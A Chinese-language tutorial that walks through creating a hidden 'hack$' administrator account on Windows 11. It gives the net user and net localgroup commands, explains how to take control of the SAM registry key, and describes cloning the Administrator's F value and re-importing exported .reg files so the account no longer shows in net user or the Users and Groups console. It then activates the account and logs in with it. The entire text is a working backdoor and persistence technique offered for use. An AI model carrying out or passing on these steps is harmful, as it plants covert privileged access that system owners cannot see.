前提:我是 win11专业版 系统
1、以管理员身份运行命令行
2、查看当前的所有用户
命令:
net user
3、创建隐藏用户
命令:net user hack$ 111111 /add
4、再次查看当前的所有用户
命令:
net user 【查看用户】
lusrmgr.msc 打开【用户和组】
可以看到:
- 命令行中 没有看到新创建的隐藏用户
- 但是可视化界面 【用户和组】中是可以看到的
5、虽然在命令行中看不到新建的隐藏用户,但是在【用户和组】中可以看到,我们进一步进行隐藏
6、将 用户 hack$ 与 用户 administrator 放在一个组中
打开【本地组策略编辑器】,禁用【密码必须符合复杂性要求】
命令:gpedit.msc
将用户【hack$】加到【administrators组】中
命令:net localgroup administrators hack$ /add
7、打开 注册表,找到 Names 进行操作
打开【注册表】
命令:regedit
7.1 打开 注册表,找到 SAM,右键属性,勾选【完全控制】
7.2 重新打开 注册表,找到 SAM,此时可以看到下边的Names菜单了
- 用户 hack$ 在注册表中的表现
- 用户 administrator 在注册表中的表现
7.3 右键-导出如图三个文件
文件名:a.reg h.reg h$.reg
- 打开导出的文件 a.reg,可以看到文件内容:其中 F 表示用户信息,V 表示权限信息;由于这两个用户之前我们放入了同一个组中,他们的权限是一致的
- 接下来将 a.reg 的整段用户信息 粘贴到 h.reg 的整段用户信息
7.4 完成以上操作后,删除此次创建的 hack$ 用户
命令:
net user hack$ /delete
- 删除后,在【注册表的Names】,在【用户和组】中图形界面上都不到用户 hack$
8、重新导入用户 hack$
- 双击之前导出的文件 h.reg
- 双击之前导出的文件 h$.reg
- 完成导入
9、导入后,查看隐藏用户
- net user 命令行不展示此用户 hack$
- lusrmgr.msc 可视化界面【用户和组】中不展示此用户
- regedit 可视化界面【注册表】Names展示此用户
10、使用 hack$ 用户登录
- 激活用户
命令:net user hack$ /active:yes
-打开【本地安全策略】-启用【交互式登录:不显示上次登录】
命令:secpol.msc
- 注销当前用户,去登录页面
- 输入隐藏用户的账号 hack$ 和密码 111111 ,完成登录
